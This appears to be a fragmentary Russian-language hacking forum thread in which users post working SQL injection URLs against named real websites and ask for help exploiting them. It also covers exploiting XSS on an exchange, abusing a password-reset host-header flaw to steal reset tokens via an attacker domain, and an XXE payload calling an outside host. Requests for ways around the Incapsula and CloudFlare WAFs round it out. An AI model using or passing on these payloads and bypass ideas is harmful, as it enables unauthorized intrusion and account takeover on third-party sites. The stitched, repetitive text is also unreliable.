#1 Code: http://www.reseau-canope.fr/climatscolaire/ressources/resultat-de-recherche.html?id=58&tx_cndpclimatsco_pi1%5Blocalisations%5D=a_32+and+1=2+union+distinct+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,@@version,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,(35)from+dual+--+ #2 Code: http://www.reseau-canope.fr/climatscolaire/ressources/resultat-de-recherche.html?id=58&tx_cndpclimatsco_pi1%5Blocalisations%5D=a_32+and+1=if((select(1)from+dual)=1,1,2)+--+ Code: http://www.quattrobi.it/ru/no_cache/proekty/view/project/168.html?no_cache=1 Прочтите текст ошибки
Пускай поздно, но промолчать не могу. Для вас и других, кто прочтёт сообщение. XSS разделяют на: Stored или Persistent - хранимые (в простонародье активные) Reflected - отраженные (... пассивные) DOM-Based Self-XSS (как Stored, так и Reflected) - исполняемые только на личных страницах и сценариях пользователя и не доступные другим пользователям То что вы описываете, это называется User Interaction (действие пользователя). Соответственно бывают и Stored XSS with/without User Interaction, так и Reflected XSS with/without User Interaction
Допустим есть биржа, где есть баланс и вся хуйня, и там есть XSS (пример прикрепил) Так вот что можно сделать ? Spoiler: Скрин
https://blog.doyensec.com/2018/05/17/graphql-security-overview.html https://raz0r.name/articles/looting-graphql-endpoints-for-fun-and-profit/
При сбросе пароля Code: host=ataker.ru&[email protected] На почте приходит Code: https://site.com/forgot/ataker.ru/973bb5606f94bbaa2509c25977f257f1ce203ea1 После смены пароля редиректит на ataker.ru Как идея я могу на ataker.ru словить Referer тем самым добыть ссылку восстановления пароля Есть другие идеи эксплуатации? ---------------------------- PS Также Бурп видет XML injection увидев DNS обращениепри при вводе xml с инклудом в host, обрашение приходит с IP Roundcube, Можете помоч?
Скорее всего, токен, после сброса пароля, станет невалидным, по крайней мере, так оно должно работать Если редиректит незаметно, без ворнингов, то фишинг вполне может пройти. Этот момент не совсем ясен, нужно подробное описание или скриншоты. В качестве теста, можно попробовать заслать какой-нибудь простенький пейлод типа: Code: <?xml version="1.0" ?> <!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "http://yourhost.com/test.txt"> ]> <foo>&xxe;</foo> И чекнуть резолв или реквест своего хоста в логах.
Так он на 5-5:35 не прав что называет Reflect XSS активной? Или он не правильно высказался что при Reflect XSS = отраженая с точке зрения воздействия это активная поскольку нужно деиствия от юзера, а Stored XSS = хранимая с точке зрения воздействия это пасивная поскольку не нужно деиствия от юзера?
Жабу скинь. А вообще октавиан, "миллион" (необоснованная мной цифра) писали про это. Оваспы, разорчик подкидывает,бум оч хорошо пишет. Споров много, НО ВСЕ ЗАВИСИТ от вектора. Вот давай я щас дупля отобью, линков тебе накидаю чтоли. Ибо я не совсем трезв, к сожалению. Большой медведь верно говорит все
^^^^^^^^^^^^^^^^^^^^^###^^^^^^^^^^ ^^^^^^^^^^^^^^^^#####^^^^####^^^^^^ ^^^^^^^^^^^^^^#^#^#^^^^#^^^^^#^^^^^ ^^^^^^^^^^^^^#^#^^#^^#^^^^^#^^#^^^^ ^^^^^^^^^^^^^#^#^#^#^#^^^##^^^#^^^^ ^^^^^^#^^^^^#^^^#^#^#^####^^^#^^^^^ ^^^^^^##^^^^#^^^#^#^^^^#^^^#^#^^^^^ ^^^^^^###^^^^#^^^#^#^^^#^^#^^^#^^^^ ^^^^^^#####^^^#^^#^^#^^##^^^^^#^^^^ ^^^^^^^#####^^^############^^##^^^^ ^^^^^^^^^^##^^^^##^^^^######^^^^^^^ ^^^^^^^^^^^##^^###^####^^^^^^^^^^^^ ^^^^^^^^^^^#####^^^^^^^^^^^^^^^^^^^ ^^^^^^^^^^###^^^^####^^^^^^^^^^^^^^ ^^^^^^^^^##^^^^^^^#####^^^^^^^^^^^^ ^^^^^^^^##^^^^^^^^^^####^^^^^^^^^^^ ^^^^^^^##^^^^^^^^^^^^###^^^^^^^^^^^ ^^^^^^##^^^^^^^^^^^^^^^#^^^^^^^^^^^
^^^^^^^^^^^^^^^^^^^^^###^^^^^^^^^^ ^^^^^^^^^^^^^^^^#####^^^^####^^^^^^ ^^^^^^^^^^^^^^#^#^#^^^^#^^^^^#^^^^^ ^^^^^^^^^^^^^#^#^^#^^#^^^^^#^^#^^^^ ^^^^^^^^^^^^^#^#^#^#^#^^^##^^^#^^^^ ^^^^^^#^^^^^#^^^#^#^#^####^^^#^^^^^ ^^^^^^##^^^^#^^^#^#^^^^#^^^#^#^^^^^ ^^^^^^###^^^^#^^^#^#^^^#^^#^^^#^^^^ ^^^^^^#####^^^#^^#^^#^^##^^^^^#^^^^ ^^^^^^^#####^^^############^^##^^^^ ^^^^^^^^^^##^^^^##^^^^######^^^^^^^ ^^^^^^^^^^^##^^###^####^^^^^^^^^^^^ ^^^^^^^^^^^#####^^^^^^^^^^^^^^^^^^^ ^^^^^^^^^^###^^^^####^^^^^^^^^^^^^^ ^^^^^^^^^##^^^^^^^#####^^^^^^^^^^^^ ^^^^^^^^##^^^^^^^^^^####^^^^^^^^^^^ ^^^^^^^##^^^^^^^^^^^^###^^^^^^^^^^^ ^^^^^^##^^^^^^^^^^^^^^^#^^^^^^^^^^^
Code: http://www.top50-solar.de/index.php?eID=tx_top50directory_pi2&L=1&tx_top50directory_pi2%5Bajaxcontroller%5D=searchziporcity&tx_top50directory_pi2%5Bcountrycode%5D=DEU%22)+order+by+1+--+ Есть варик на вывод колонок? проблема в том, что когда 1 колонка(по order by) ошибка страницы... по тайм байс перебор не берёт(
Кто-нибудь обходил incapsula WAF при скуле? Есть mssql injection внутри convert(int,query) при введении @@version в параметр получаем версию mssql При попытке (select+@@version), (select(@@version)) incapsula WAF реагирует, 403 в общем-то, все обычные методы типы апострофов, комментариев, encode, и тд, пробую - не пропускает Incapsula. Есть у кого опыт? есть хоть какой рабочий вектор?
https://github.com/sqlmapproject/sqlmap/blob/master/waf/incapsula.py хуй знает поможет или нет отпишись если поможет
Подскажите как раскручивать sql-inj в таких ситуациях: 1) cPanel глушит почти что всё в 403-ию ошибку (HTTP Error 403 - Forbidden) metroeyesng.com/?/product/online_store/&prd_id=11 (Параметр prd_id) 2) Есть ли в настоящий момент "действующие" tamper'ы sqlmap'a для обхода CloudFlare? (PS: выяснять реальный ip не подходит) Или хотя бы рабочий пример какой-нибудь(